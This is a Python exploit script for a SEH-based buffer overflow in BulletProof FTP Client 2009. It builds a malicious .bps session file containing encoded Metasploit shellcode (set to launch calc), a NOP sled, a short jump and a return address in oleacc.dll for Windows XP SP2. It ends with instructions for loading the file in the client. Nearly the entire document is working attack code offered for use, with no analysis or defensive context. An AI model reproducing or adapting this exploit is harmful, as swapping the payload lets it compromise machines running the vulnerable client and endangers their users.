#!/usr/bin/python #[*] Bug : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH) #[*] Credits : Stack #[*] Tested on : Xp sp2 (fr) #[*] Exploited by : His0k4 #[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com #[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D #[*] translate by Cyb3r-1st: esse7 embe7 embou :D # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode=( "\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71" "\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8" "\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4" "\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80" "\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb" "\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9" "\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06" "\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5" "\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89" "\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d") header1=( "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74" "\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74" "\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e" "\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20" "\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c" "\x79\x2e\x0d\x0a") exploit = "passwords.hotmail.com" exploit += "\x90"*68 exploit += "\x74\x06\x90\x90" #oplaa! exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2) exploit += shellcode header2=( "\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71" "\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a" "\x2f\x0d\x0a") vuln = header1 + exploit + header2 try: out_file = open("sploit.bps",'w') out_file.write(vuln) out_file.close() print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n" except: print "Error!"